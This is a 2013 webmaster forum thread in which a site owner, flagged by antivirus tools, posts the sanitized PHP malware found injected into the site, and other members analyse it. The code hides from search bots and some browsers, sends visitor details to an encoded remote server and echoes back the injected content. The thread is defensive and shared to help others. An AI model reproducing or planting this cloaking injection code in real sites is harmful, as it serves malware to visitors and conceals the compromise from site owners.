homepage Welcome to WebmasterWorld Guest from 54.161.247.22
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Home / Forums Index / WebmasterWorld / Webmaster General
Forum Library, Charter, Moderators: phranque

Webmaster General Forum

    
Strange Virus Notice for Website
AVG and eset nod32 shows virus notice
klpm




msg:4569610
 9:36 am on May 1, 2013 (gmt 0)

Hello,

Since yesterday, both AVG and ESET NOD32 do not allow to access one of our websites.

I did not find any malicious code when i checked the source code.

I am desperately looking to resolve the issue.

Check [snip]


ESET NOD says site is infected with Kryptik.ajz

AVG says blackhole exploit Trojan

[edited by: phranque at 10:36 am (utc) on May 1, 2013]
[edit reason] no personal urls please [/edit]

 

phranque




msg:4569624
 10:37 am on May 1, 2013 (gmt 0)

welcome to WebmasterWorld, klpm!


i would look for any obfuscated javascript and especially anything that looks like a document.write or similar.

klpm




msg:4569630
 11:59 am on May 1, 2013 (gmt 0)

thanks phranque. but i finally figured out and solved the issue (thanks to "temporary disable" option in AVG).

would like to share the code thinking it may help other website owners.

The code was acting very smart.

malicious code does not generate if the page is accessed by search bot such as google, msn and yahoo ( so that website owner does not come to know about virus infection)

check the code below....

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( '[some encoded malware here]').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

[edited by: phranque at 12:45 pm (utc) on May 1, 2013]
[edit reason] sanitized [/edit]

Dijkgraaf




msg:4569836
 11:29 pm on May 1, 2013 (gmt 0)

It's is interesting that it treats the browsers opera, chrome and safari as being bots and doesn't serve them the malware.
So it must be targeting IE and Firefox.

Also it looks like the writer of this code may not be a native English speaker as there are multiple spelling and grammar mistakes in the comments.

A search for the phrase "Looks for google serch bot" comes up with a fair number of results dating back to at least 2010.

What you need to determine is how your site was compromised in the first place allowing them to add the PHP script. It looks like a fair number of the sites that were infected were Wordpress ones possibly using this vulnerability.
[markmaunder.com...]

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / WebmasterWorld / Webmaster General
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved